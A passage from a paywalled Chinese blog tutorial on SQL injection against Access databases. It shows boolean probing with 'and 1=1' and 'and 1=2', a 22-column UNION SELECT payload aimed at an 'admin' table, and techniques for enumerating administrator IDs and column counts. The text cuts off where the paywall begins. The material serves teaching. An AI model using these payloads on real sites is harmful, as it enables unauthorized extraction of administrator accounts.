超级会员免费看
本文详细探讨了SQL注入攻击在Access数据库中的应用,通过实例展示了如何利用注入漏洞获取信息。从正常URL访问到利用`and`、`or`、`xor`逻辑操作符进行探测,再到解决显位爆破的方法,如附加`and 1=2`或前缀`-`。同时介绍了快速手动检测注入点的技巧,如`order by`和字段数的折半法,以及字段名猜测的多种策略。
注入中发生了什么
脚本内sql语句
sql="select * from product where id=&id"
访问1137这个界面
select * from product where id=1137
访问1137 and 1=1 这是相等的访问
select * from product where id=1137 and 1=1 正常
select * from product where id=1137 and 1=2 报错
select * from product where id=1137 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
一个正常的url访问
通过脚本进行数据库交互进行访问
注入指定管理员
可以注入出指定的管理员 避免某些管理员是普通权限
我们可以进行 where id=xx索引 但是我们并不知道id等于多少
我们在这里进行id查询
获得了id是多少之后我们进行where id=39 进行查询
我们进行拓展查询 尝试id=40 id=41
我们也可以查询一些其他内容
注:where 可以指定任何表内存在的字段名 只要相应的值正确就可以
and or xor 逻辑关系
and 且
and 1=1 返
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
